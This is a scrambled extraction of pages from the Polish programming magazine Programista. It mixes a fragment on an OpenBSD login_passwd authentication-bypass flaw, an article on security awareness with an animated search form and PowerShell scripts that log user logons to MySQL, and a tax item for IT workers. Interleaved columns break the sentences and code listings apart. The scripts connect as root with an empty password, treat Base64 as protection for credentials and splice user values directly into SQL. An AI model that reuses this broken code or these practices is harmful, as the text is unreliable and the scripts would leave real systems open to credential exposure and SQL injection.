jako parametry programu, co oznacza, że jeżeli login przyjmie for- 16 switch (argc - optind) {
mę „-opcja”, to zostanie on zaklasyfikowany jako opcja do programu 17 case 2:
18 class = argv[optind + 1];
uwierzytelniającego, a nie jako nazwa użytkownika z myślnikiem na 19 /* FALLTHROUGH */
początku. 20 case 1:
21 username = argv[optind];
Drugim błędem, który już umożliwił exploitację, jest błąd lo- 22 break;
23 default:
giczny. Jak już wspomniano, wszystkie programy uwierzytelniające 24 syslog(LOG_ERR, "usage error");
muszą implementować trzy serwisy: login, challenge i response. Co 25 exit(1);
26 }
w przypadku, jeżeli dany program uwierzytelniający nie ma wspar- 27
cia challenge-response? To zależy już od implementacji. Program 28 /*
29 * get the password hash before
login_passwd weryfikuje hasło, opierając się tylko na pliku master. 30 * pledge(2) or it will return '*'
passwd, który nie wspiera metody challenge-response. Okazuje się, 31 */
32 pwd = getpwnam_shadow(username);
że w przypadku tego programu twórcy zdecydowali się zwracać po // […]
prostu powodzenie logowania. W Listingu 3 możemy znaleźć frag- 33 if (mode == 1) {
ment dokumentacji OpenBSD, która opisuje to zachowanie. 34 fprintf(back, BI_SILENT "\n");
35 exit(0);
Listing 3. Fragment dokumentacji login_passwd z OpenBSD 36 }
2. W celu zaznaczenia, że połączenie jest zaufane, przy konfiguracji nasłuchiwania należy dodać sło-
wo kluczowe secure, np. listen on vio0 port 389 secure.
/* REKLAMA */
{ WWW.PROGRAMISTAMAG.PL } <63>
Z ARCHIWUM CVE
którzy z nas inspirację znajdą w takich internetowych platformach Mamy tu do czynienia z ważną z punktu widzenia bezpieczeństwa
jak Stack Overflow, inni z kolei wpadną na pomysł rozwiązania na różnicą. Otóż cała ta strona znajduje się w firmowej sieci Intranet, a co
portalach typu CodePen. Jednym z najważniejszych celów w życiu za tym idzie wszystko, co użytkownik wpisze w formularz, znajdzie
każdego z nas powinna być nauka, w jaki sposób i gdzie szukać po- się na firmowych serwerach. Przykład ten nie przewiduje filtrowania
mysłów, które pozwolą pokonywać przeszkody na naszej programi- treści, zbierania logów i tym podobnych, ale nic nie stoi na przeszko-
stycznej drodze. Na potrzeby tego zadania postanowiłem przysto- dzie, by rozwinąć taki projekt wedle zapotrzebowania. Przejdźmy
sować przykład formularza do logowania zaprezentowany przez @ jednak do naszego zadania, czyli uświadamiania pracowników, że
dsennef (https://codepen.io/dsenneff/). Głównym celem, jaki chcemy każda informacja przez nich wpisana w firmową wyszukiwarkę może
w tym przypadku osiągnąć, jest uczulenie naszych pracowników na stanowić zagrożenia dla bezpieczeństwa. W Listingu 1 pojawiają się
to, co i gdzie wpisują. Jedną z najprostszych dróg do osiągnięcia sa- dwa niestandardowe elementy: klasa svgContainer i załadowane
tysfakcjonującego rezultatu będzie umiejscowienie własnej strony do zewnętrzne biblioteki twin.js oraz mis.js. Oba te komponenty będą
wyszukiwania w Internecie, tak jak ma to miejsce na zaprezentowa- nam potrzebne do wygenerowania i przekształcenia w interaktywny
nym Rysunku 3. obiekt widocznego na Rysunku 2 misia. Jak już wspomniano, nasze
zadanie polega na tym, by pracownik zwracał baczniejszą uwagę na
to, co wpisuje w przeglądarkę. Pomóc nam w tym mogą przykuwają-
ce uwage ruszające się i interaktywne elementy. W tym celu musimy
naszego misia narysować i podzielić na ruchome elementy. Najlepiej
do tego użyć formatu SVG, czyli stworzyć go w postaci wektorowej.
Widoczny na Rysunku 2 miś znajduje się w klasie svgContainer,
natomiast część odpowiadająca za narysowanie jednej z łap zapre-
zentowana została w Listingu 2. Pełny kod projektu dostępny jest
Rysunek 3. Przykładowy schemat infrastruktury z własną stroną wyszukiwania w serwisie GitHub (link na końcu artykułu).
{ WWW.PROGRAMISTAMAG.PL } <67>
PLANETA IT
function coverEyes() {
TweenMax.killTweensOf([armL, armR]);
TweenMax.set([armL, armR], {visibility: "visible"});
TweenMax.to(armL, .45, {x: -93, y: 10,
rotation: 0, ease: Quad.easeOut});
TweenMax.to(armR, .45, {x: -93, y: 10,
rotation: 0, ease: Quad.easeOut, delay: .1});
eyesCovered = true;
}
function uncoverEyes() {
TweenMax.killTweensOf([armL, armR]);
TweenMax.to(armL, 1.35, {y: 220, ease: Quad.easeOut});
TweenMax.to(armL, 1.35, {rotation: 105,
ease: Quad.easeOut, delay: .1});
TweenMax.to(armR, 1.35, {y: 220, ease: Quad.easeOut});
TweenMax.to(armR, 1.35, {rotation: -105,
ease: Quad.easeOut, delay: .1, onComplete:
function() {
TweenMax.set([armL, armR], {visibility: "hidden"});
}});
eyesCovered = false;
Rysunek 4. Prezentacja pierwszej interakcji misia }
function onSearchInput(e) {
Po narysowaniu w przeglądarce naszego yeti musimy sprawić, by calculateFaceMove(e);
przybrał on formę interaktywną. W tym celu wykorzystamy dar- var value = search.value;
curSearchIndex = value.length;
mowe biblioteki GSAP – GreenSock (https://greensock.com). Aby
if(curSearchIndex > 0) {
zwrócić uwagę pracownika, w misia zaimplementujemy szereg akcji TweenMax.to([eyeL, eyeR], 1, {scaleX: .85, scaleY:
i interakcji. Pierwszą z nich zaprezentowano na Rysunku 4. W po- .85, ease: Expo.easeOut});
eyeScale = .85;
równaniu z Rysunkiem 2 zauważyć możemy, że nasz miś zakrywa
if(curSearchIndex >= 6) {
łapami oczy. Jednak pierwszą i trwającą przez cały czas akcją jest coverEyes();
mruganie oczami, które zostało zaprezentowane w Listingu 3. Ak- resetFace();
stopBlinking();
cja ta składa się z dwóch funkcji. Pierwsza z nich, getRandomInit, startBlinking(5);
jak sama nazwa wskazuje, odpowiedzialna jest za wygenerowanie }
if(curSearchIndex > 9) {
losowej liczby. Natomiast funkcja startBlinking do przypisanych spreadFingers();
elementów odpowiadających lewemu i prawemu oku dodaje efekt }
if(curSearchIndex < 9) {
wchodzący w skład biblioteki GSAP 2 o nazwie yoyo i uruchamia go closeFingers();
}
z opóźnieniem. Za animacje naszych elementów wektorowych odpo- if(curSearchIndex < 6) {
wiedzialna jest funkcja TweenMax, która także wchodzi w skład wspo- uncoverEyes();
}
mnianej już biblioteki GSAP 2. if(curSearchIndex > 16) {
closeFingers();
Listing 3. Animacja mrugania oczami misia }
if(curSearchIndex > 18) {
function getRandomInt(max) { calculateFaceMove(e);
return Math.floor(Math.random() * TweenMax.to(armL, .5, {x: -93, y: 0, rotation:
Math.floor(max)); -0.5, ease: Quad.easeOut});
} closeFingers();
}
function startBlinking(delay) { if(curSearchIndex > 4) {
delay = getRandomInt(delay); TweenMax.to([eyeL, eyeR], 1, {scaleX: .65,
blinking = TweenMax.to([eyeL, eyeR], scaleY: .65, ease: Expo.easeOut,
.1, {delay: delay, scaleY: 0, yoyo: true, transformOrigin: "center center"});
repeat: 1, transformOrigin: "center center", } else {
onComplete: function() { TweenMax.to([eyeL, eyeR], 1, {scaleX: .85,
startBlinking(5); scaleY: .85, ease: Expo.easeOut});
}}); }
} } else {
startBlinking(5); TweenMax.to([eyeL, eyeR], 1, {scaleX: 1,
scaleY: 1, ease: Expo.easeOut});
uncoverEyes();
Pierwotnie zainicjowana pozycja łap naszego yetiego znajduje się poza }
}
widocznym na Rysunku 4 okręgiem. Animacja zakrywania przy uży-
function onSearchFocus(e) {
ciu łap uruchamia się w tym momencie, w którym pracownik rozpo- activeElement = "email";
czyna pisanie frazy w polu wyszukiwania. Dodatkowo, gdy klikniemy onEmailInput();
}
gdziekolwiek indziej niż samo pole wyszukiwania, twarz misia zo-
function onSearchBlur(e) {
stanie odkryta i będzie on ponownie wyglądać tak jak na Rysunku 2. activeElement = null;
W przypadku tych interakcji także korzystamy z biblioteki GSAP 2. setTimeout(function() {
if(activeElement !== "search") {
Akcje nie są złożone. Podsumowując, możemy napisać, że pozycja łap if(e.target.value == "") {
zostaje wyrzucona i ukryta poza widoczny kontener i na odwrót. e.target.parentElement.classList.
{ WWW.PROGRAMISTAMAG.PL } <69>
PLANETA IT
filtrowanie zajmuje niekiedy mnóstwo czasu. Możemy także zdać się Mamy już webową aplikację do prezentacji logowań i miejsce w po-
na rozwiązania płatne, ale to wiąże się z dodatkowym oprogramowa- staci bazy danych, w którym będziemy gromadzić potrzebne nam
niem, które same w sobie może stać się zagrożeniem bezpieczeństwa. informacje. Trzeba jeszcze znaleźć sposób na pobieranie i przesyła-
Trzeba pamiętać, że ataki często przeprowadzane są na dane firmy nie tych danych do naszej bazy. W przypadku infrastruktury głów-
właśnie poprzez aplikacje trzecie. Mając za priorytet bezpieczeństwo nie opartej na systemach operacyjnych Microsoft możemy posłużyć
naszej infrastruktury, chcemy mieć jeden portal, w którym będziemy się PowerShellem. Musimy jednak pamiętać o wspomnianym już
mogli zbierać informacje o logowaniach, ilościach tych logowań itp. konektorze MySql.Data.dll. Konektor ten możemy pobrać ze strony
W razie gdyby okazało się, że jakiś login zbyt często się autoryzuje producenta w postaci instalatora MSI: https://www.mysql.com/pro-
lub jakieś administracyjne konto pojawia się w statystykach o godzi- ducts/connector/, a to oznacza, że w środowisku bazującym na Win-
nach i na serwerach, na których nie powinno, to będziemy w stanie dowsach możemy rozpropagować taką paczkę na wszystkie kompu-
takie zdarzenie wychwycić. Aby to zrobić, możemy oprzeć nasze roz- tery w domenie poprzez GPO. Możemy także za pomocą głównego
wiązanie o zaprezentowaną na Rysunku 7 aplikację webową Grafana. skryptu zaimplementować kopiowanie z zasobu sieciowego podczas
Dzięki niej będziemy w stanie w sposób graficzny, względnie szybki uruchomienia. Zawsze pozostaje też opcja jego ręcznego kopiowania
i intuicyjny przeglądać logowania. Możemy także przygotować goto- na wybrane serwery.
we filtry zbierające ilość logowań danego użytkownika w ostatnich
Listing 6. Skrypt w PowerShell do połączenia z bazą danych i przesyłania
24 godzinach czy pojawiające się odbiegające od norm loginy. Jednak informacji o logowaniach
aby to osiągnąć, potrzebujemy danych.
Add-Type -Path "C:\Audyt\MySQL.Data.dll"
$l = 'root'
$p = ''
$SQLServer = ""
$SQLDBName = "Audyt"
$h = $env:computername
$log = $env:UserName
if ($log) {
$ol = Get-WmiObject
Rysunek 7. Wygląd zebranych danych w Grafana Win32_NetworkAdapterConfiguration |
Select-Object IPAddress,MacAddress
kluczem całej tabeli. Z kolei ts to kolumna, która wygeneruje time- $Command.Connection = $conn
stamp, czyli znacznik czasu, w którym pojawi się nowy wpis. Nale- $Command.Connection.Open()
$Command.ExecuteNonQuery()
ży pamiętać, aby serwer, na którym znajduje się baza danych, miał $Command.Connection.Close()
poprawny czas. W firmach z reguły nie stanowi to problemu, ponie- }
}
waż produkcyjne serwery powinny się synchronizować z serwerem
z usługą czasu NTP.
W Listingu 6 zaprezentowany został kod w PowerShellu, który za po-
Listing 5. Skrypt generujący bazę danych wraz z tabelami
mocą konektora połączy się i zapisze potrzebne nam dane. Na po-
CREATE DATABASE Audyt; czątku dodajemy wspomniany już konektor, jako klasę .NETowską.
CREATE TABLE user (
id int auto_increment, Następnie definiujemy takie zmienne jak login, hasło, adres serwera
login varchar(255) not null, z bazą, nazwę samej bazy danych, lokalną nazwę komputera i sys-
IP varchar(255),
hostname varchar(255), temowego użytkownika. Dalej, po sprawdzeniu, czy lokalna nazwa
mac varchar(255),
ts TIMESTAMP,
użytkownika istnieje, pobieramy z obiektu Win32_NetworkAdapter-
primary key(id) Configuration adres IP i MAC. W kolejnym kroku upewniamy się,
);
że pobraliśmy odpowiedni adres IP, i przechodzimy do połącze-
nia z bazą danych. W zmiennej $Command za pomocą wbudowanej
w konektor klasy tworzymy obiekt z informacją o połączeniu i sa-
mym zapytaniem do bazy. W zapytaniu tym umieszczamy pobrane certyfikatem, ale z doświadczenia wiem, że to dość mocno spowalnia
dane i na końcu zamykamy połączenie. działanie przy ponad 200 sesjach na jednym serwerze. Kolejną róż-
Kod zaprezentowany w Listingu 6 dotyczy jednak tylko kompu- nicą jest pobranie adresu IP z dziennika zdarzeń. Dzięki takiemu za-
terów, pojawia się więc pytanie, co z połączeniami zdalnymi, czyli biegowi będziemy posiadali adres IP, z którego łączy się użytkownik,
z połączeniami do sesji zdalnych użytkownika? To dość ciekawe za- a nie adres serwera hostującego sesję. Ponadto należy się upewnić, że
gadnienie, ponieważ gdybyśmy użyli naszego skryptu na serwerach adres nie jest podobny do tych z puli adresów przypisanych do farmy
sesji terminalowych, to oczywiście w bazie danych byłby login, czas serwerów terminalowych. Warto także wspomnieć, że rezygnujemy
logowania, ale jako nazwę i adres IP dostalibyśmy dane serwera, a nie w tym przypadku z pobrania MAC adresu.
komputera czy terminala, z którego użytkownik się łączył. Dlatego
Listing 7. Skrypt w PowerShell do połączenia z bazą danych i przesyłania
w przypadku farmy RDS musimy zmienić podejście. Po pierwsze, informacji o sesjach
musimy umożliwić użytkownikom odczyt domeny dziennika zda-
Add-Type -Path "C:\Audyt\MySQL.Data.dll"
rzeń bezpieczeństwa C:\Windows\System32\winevt\Logs\Security. $l = [System.Text.Encoding]::UTF8.GetString(
evtx. Po drugie, skrypt taki dodać trzeba jako wykonywany, zgodnie [System.Convert]::FromBase64String(""))
$p = [System.Text.Encoding]::UTF8.GetString(
z tym, co przedstawiono na Rysunku 8. [System.Convert]::FromBase64String(""))
Ważne jest również, aby zadanie mogło być wykonane przez $SQLServer = ""
każdego użytkownika domeny, a także by każde wywołanie było $SQLDBName = "Audyt"
$h = $env:computername
asynchroniczne. Dzięki temu nasz skrypt będzie się wykonywał za $log = $env:UserName
każdym razem, gdy loguje się nowa sesja pracownika, ale także gdy $logObj = '';
użytkownik pulpitu zdalnego podłączy się ponownie do swojej już $result = '';
$LogOnEvents = '';
istniejącej na serwerze sesji. W Listingu 7 przedstawiono zmodyfiko-
if ($log) {
wany skrypt do wyciągania potrzebnych nam informacji i umieszcza- $LogOnEvents = Get-WinEvent -filterHashtable
nia ich w bazie danych. Zważywszy na to, że jest to bardzo podobny @{Path='C:\Windows\System32\winevt\
Logs\Security.evtx'; Id=4624; Level=0} |
skrypt do tego zaprezentowanego w Listingu 6, skupmy się tylko na Where-Object{ $_.Properties[8].Value -eq
różnicach. Pierwszą zmianą rzucającą się w oczy jest dekodowanie 10 -AND $_.Properties[18].Value -ne
$null -AND $_.Properties[5].value -eq
zapisanego loginu i hasła użytkownika logującego się do bazy da- $env:UserName} | Select-Object -First 1
nych. Trzeba pamiętać, że PowerShell to język skryptowy, który dość $Ip = $LogOnEvents.Properties[18].value
łatwo można „podejrzeć” podczas wykonywania i takie drobne za- $logObj = $Ip
$result = $result + $logObj
biegi na pewno poprawią bezpieczeństwo samego skryptu, a przecież
if ($result -notlike "192.168.100.*") {
głównym tematem tego artykułu jest cybersecurity. Pamiętanie o za-
$result | Out-File \\logon\$env:UserName
bezpieczaniu narzędzi, które tworzymy, jest tutaj kluczowe. W final- \OstatniRDS.txt
nej wersji można by było pokusić się nawet o zakodowanie całości
{ WWW.PROGRAMISTAMAG.PL } <71>
PLANETA IT
$Command = New-Object MySql.Data. przestępcy mają możliwość zamontować sprzęt przechwytujący lub
MySqlClient.MySqlCommand
skanujący. W sytuacji, w której jedna dioda przestałaby być widoczna
$conn = New-Object MySql.Data.MySqlClient.
MySqlConnection("server=$SQLServer;user dla użytkownika, istniałaby szansa, granicząca z pewnością, że umysł
id=$l;password=$p;database=$SQLDBName") by zareagował. Walka z automatyzmami jest bardzo ważna w świecie
$Command.CommandText = "INSERT INTO bezpieczeństwa, a kto, jak nie programiści, powinni być tymi, którzy
user (Login,IP,hostname)
VALUES('$log','$result','$h')"
wytwarzają odpowiednie oprogramowanie? Wielu z nas często jed-
nak zapomina, że jesteśmy także tymi, którzy powinni takie rozwią-
$Command.Connection = $conn
zania wyszukiwać i proponować. To właśnie dzięki takiemu podej-
$Command.Connection.Open()
$Command.ExecuteNonQuery() ściu Elon Musk zmienia nasz świat.
$Command.Connection.Close() Nie ukrywam, że pisząc ten artykuł, towarzyszyła mi nadzieja, że
}
} uda mi się zainteresować czytelnika tematem cybersecurity i przed-
stawić podejście, jakie moim zdaniem powinno charakteryzować
Nic nie stoi na przeszkodzie, aby podobny skrypt napisać dla syste- ukierunkowanego na bezpieczeństwo programistę. W świecie IT
mów Linux na przykład w Pythonie i za jego pomocą zbierać podob- często bywa tak, że dział, który pierwotnie zajmuje się jednym tema-
ne informacje. Dla odważnych na wirtualnym stole jest także opcja tem, po jakimś czasie rozrasta się do wielkości drzewa z wieloma ga-
instalacji PowerShella na Linuksie... Dodanie funkcji sprawdzającej, łęziami. Nie inaczej jest w tym przypadku. Cybersecurity to obecnie
czy zapytanie wykonało się poprawnie, obsługa błędów czy odkłada- bezpieczeństwo sieci, komputerów, infrastruktury, ale także mento-
nie logów z samych wykonań skryptu to już jednak temat na inny ring pracowników i szkolenia z zakresu poznawania i radzenia sobie
artykuł. Zaproponowane kody to tylko przykłady, że programiści po- z zagrożeniami. Wymieniłem tylko kilka przykładów. Cybersecurity
winni udzielać się na każdym kroku i wspierać cyberbezpieczeństwo jest jeszcze na tyle młodą dziedziną, że nie ma jasno zdefiniowanej
swoją wiedzą i umiejętnościami. Kto, jak nie my ze swoim nieszablo- granicy, ale czy tak naprawdę kiedykolwiek będzie ją mieć?
nowym spojrzeniem na świat, powinien to czynić? Cybersecurity to Moim celem było pokazanie, że nie zawsze musimy pisać wszyst-
nadal młoda i nie do końca ukształtowana dziedzina IT, którą moż- ko od zera, a liczy się pomysł i umiejętność znalezienia rozwiązania.
na śmiało przyrównać do nowo rozpoczętej pracy, w której mamy W przypadku bezpieczeństwa i edukowania użytkowników często
do czynienia z zespołem ludzi, którzy muszą zmierzyć się z nowym wystarczą względnie proste rozwiązania, aby osiągnąć zamierzony
projektem, będącym wyzwaniem także dla samej firmy. Mamy moż- efekt. W artykule omówiliśmy dwa scenariusze. Pierwszy z nich to
liwość sami definiować, gdzie leżą granice i z jakich technologii bę- swego rodzaju eksperyment polegający na zbudowaniu prostego for-
dziemy korzystać. Zatem wszystkie ręce na klawiaturę, bo jeśli nie mularza internetowego, który wyposażyliśmy w interaktywne akcje
zadbamy o bezpieczeństwo i nie dołożymy swojej linijki kodu, to już mające na celu skupić uwagę użytkownika na tym, co i gdzie wpi-
całkiem niedługo może się okazać, że nasze aplikacje oraz rozwiąza- suje. W drugim scenariuszu posłużyliśmy się językiem skryptowym
nia będą podatne na włamania. PowerShell, ale także wykorzystaliśmy gotowe rozwiązania, takie jak
To właśnie dzięki tego typu zadaniom napotkanym w świecie IT baza danych MariaDB czy platforma Grafana. W obydwu przykła-
widać jak na dłoni, że Informatyka to przełożenie świata realnego dach starałem się kłaść nacisk nie tyle na samo rozwiązanie, co na
na wirtualny i to wraz z problemami tego pierwszego. Weźmy taki przekazanie sposobu myślenia, jaki powinien nam towarzyszyć na co
przykład: Korzystając z bankomatów, jako urządzeń do wpłacania dzień. Dzięki niemu nie tylko będziemy w stanie zdiagnozować pro-
i wypłacania pieniędzy, zostaliśmy w pewnym momencie zbombar- blemy cybersecurity w naszej firmie, ale i nasze wdrożenia staną się
dowani wiadomościami o złodziejach pinów i kopiowanych kar- bezpieczniejsze.
tach. W Polsce odbywały się całe kampanie mające na celu eduko-
wać społeczeństwo w temacie bezpieczeństwa pinu. Byliśmy także
informowani, że należy uważać na montowane przez przestępców
kamery skierowane na klawiatury. Jesteśmy jednak gatunkiem, któ-
ry szybko zapomina, a nasz umysł ulega automatyzmom i pamięci
mięśniowej. Z tego powodu bankomaty zostały przeprojektowane
W sieci
i dodane zostały osłonki na klawiatury. Pytanie, czy nie lepszym » https://github.com/kafej/Programista_Mis
» https://github.com/kafej/Programista_Audyt
rozwiązaniem byłyby 3 diody znajdujące się w miejscach, w których
MICHAŁ ZBYL
[email protected]
Artykuł napisany został przez wariata, na co dzień pracownika UBS, w którym projektuje i wdraża mały bank w dużym banku.
Dla śmieszności wydarzeń wystarczy dodać, że planuje, konfiguruje i wdraża Infrastrukturę IT od sieci po całe serwerownie
tu i tam. Stawia na VMware i uważa, że kontenery nie sprawdzają się wszędzie. Czasem żeby udowodnić, że na pewno wariat,
zaliczy sobie taki czy inny certyfikat z języka japońskiego.
50% KOSZTY UZYSKANIA PRZYCHODU czasem najnowsza interpretacja indywidualna Krajowej Informacji
Skarbowej wyjaśnia szeroki zakres pojęcia „działalności twórczej
DLA BRANŻY IT w zakresie programów komputerowych”, co zgodnie z jej treścią „do-
Zgodnie z art. 22 ust. 9 pkt 3 ustawy o PIT koszty uzyskania przycho- tyczy korzystania i rozporządzania prawami autorskimi do wszelkich
du „z tytułu korzystania przez twórców z praw autorskich i artystów utworów, które powstają w związku z działaniami podejmowanymi
wykonawców z praw pokrewnych, w rozumieniu odrębnych przepi- w celu stworzenia programów komputerowych”. Stanowisko to może
sów, lub rozporządzania przez nich tymi prawami” są równe 50 proc. ułatwić stosowanie podwyższonych kosztów przychodu kolejnym
uzyskanego przychodu. Wśród działalności twórczej objętej ulgą wy- specjalistom z branży IT, biorącym udział w skomplikowanych pro-
mienia się m.in. działalność w zakresie programów komputerowych. cesach twórczych w zakresie programów czy gier komputerowych.
Problemem jest jednak brak zdefiniowanego pojęcia „działalności
w zakresie programów komputerowych” zarówno w ustawie o PIT,
KOMENTARZ AUTORA
jak i w jakimkolwiek innym akcie prawnym. Już pierwsze interpre-
tacje rozwiały wątpliwości, że 50 proc. koszty uzyskania przychodu Wnioskując o wydanie interpretacji indywidualnej w sprawie moż-
mogą być stosowane nie tylko przez programistów, ale także przez ana- liwości zastosowania 50 proc. kosztów uzyskania przychodu w sto-
lityków programów komputerowych, grafików, product ownerów czy sunku do UX/UI Designerów, mieliśmy świadomość, że szereg wyda-
webdeveloperów, jednak szybko rozwijająca się branża IT stawia przed nych już interpretacji potwierdza taką możliwość. Chcieliśmy jednak
Krajową Informacją Skarbową kolejne wyzwania w postaci wniosków zabezpieczyć klienta poprzez potwierdzenie w interpretacji szeroko-
o wydanie interpretacji w interesie nowych specjalizacji i zawodów ści definicji „działalności twórczej w zakresie programów kompute-
twórczych. Tak było w przypadku pracodawców zatrudniających spe- rowych”. W mojej ocenie wydana interpretacja ma duże znaczenie
cjalistów do projektowania produktów w zakresie UX/UI, którzy mieli dla całej branży IT oraz gamedev, gdyż potwierdza, że za taką dzia-
wątpliwości, czy ten typ pracy może być uznany za działalność twórczą łalność – w rozumieniu przepisów podatkowych – można uznać
w zakresie programów lub gier komputerowych, i obawiali się, że za- bardzo szeroki zakres prac wykonywanych w trakcie procesu pro-
stosowanie 50 proc. kosztów uzyskania przychodu zostanie zakwestio- jektowego. Utrwalenie takiego podejścia może mieć wpływ nie tylko
nowane w razie kontroli skarbowej. Dotychczas wydane interpretacje na szerszą możliwość stosowania podwyższonych kosztów uzyskania
indywidualne potwierdzają prawo UX/UI Designerów do stosowania przychodu w branży IT, ale potencjalnie na rozszerzenie grupy pod-
zmniejszonej podstawy opodatkowania. Jednak żadna z tych interpre- miotów, które będą mogły skorzystać z ulgi IP Box.
tacji nie odnosi się wprost do definicji „działalności twórczej”.